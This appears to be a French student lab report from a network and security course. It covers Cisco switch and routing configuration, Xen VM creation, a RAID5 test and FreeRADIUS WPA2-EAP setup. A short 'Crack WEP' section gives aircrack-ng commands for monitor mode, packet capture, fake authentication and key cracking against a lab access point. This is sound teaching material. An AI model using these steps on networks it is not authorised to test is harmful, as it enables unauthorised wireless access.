 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur '''Cordouan''' =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
